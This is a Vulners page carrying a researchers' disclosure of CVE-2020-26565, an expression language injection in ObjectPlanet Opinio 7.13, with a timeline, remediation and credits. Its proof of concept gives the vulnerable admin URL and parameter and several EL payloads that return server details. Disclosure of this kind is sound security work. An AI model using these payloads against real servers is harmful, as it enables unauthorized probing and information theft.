Vulners
Lucene search
ObjectPlanet Opinio 7.13 Expression Language Injection Vulnerability
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2020-26565 | 31 Jul 202120:25 | – | circl |
 | ObjectPlanet Opinio 安全漏洞 | 30 Jul 202100:00 | – | cnnvd |
 | CVE-2020-26565 | 31 Jul 202116:43 | – | cve |
 | CVE-2020-26565 | 31 Jul 202116:43 | – | cvelist |
 | EUVD-2020-19110 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-26565 | 31 Jul 202117:15 | – | nvd |
 | ObjectPlanet Opinio 7.13 Expression Language Injection | 30 Jul 202100:00 | – | packetstorm |
 | Design/Logic Flaw | 31 Jul 202117:15 | – | prion |
 | CVE-2020-26565 | 22 May 202516:13 | – | redhatcve |
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26565
# Exploit Title: ObjectPlanet Opinio version 7.13 allows expression language injection
# Vendor Homepage: https://www.objectplanet.com/opinio/
# Software Link: https://www.objectplanet.com/opinio/
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26565
# Timeline
- September 2020: Initial discovery
- October 2020: Reported to ObjectPlanet
- November 2020: Fix/patch provided by ObjectPlanet
- July 2021: CVE-2020-26565
# 1. Introduction
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.
# 2. Vulnerability Details
ObjectPlanet Opinio before version 7.13 is vulnerable to expression language injection
# 3. Proof of Concept
### Expression Language Injection leading to sensitive information disclosure ###
Step 1:
URL: /opinio/admin/permissionList.do?userId=1&from=$%7b7%2a7%7d
Payload: ${7*7} - URL encoded
The "from" parameter is vulnerable to Expression Language injection and this was validated by inspecting the loaded page source which executed the URL encoded payload to return 49
This vulnerability can be used to enumerate the sensitive information about the web server. Some examples of payloads that executed successfully are:
- ${pageContext.request.serverName} - returned server name
- ${pageContext.serveletContext.serverInfo} - returned server information
- ${pageContext.servletConfig.class} - returned information about the Apache server
This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html
-------------------------------------------------------
# 4. Remediation
Apply the latest fix/patch from objectplanet.
# 5. Credits
Timothy Tan (https://sg.linkedin.com/in/timtjh)
Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)
Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)
Daniel Tan (https://www.linkedin.com/in/dantanjk/)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jul 2021 00:00Current
0.1Low risk
Vulners AI Score0.1
CVSS 25
CVSS 3.17.5
EPSS0.00399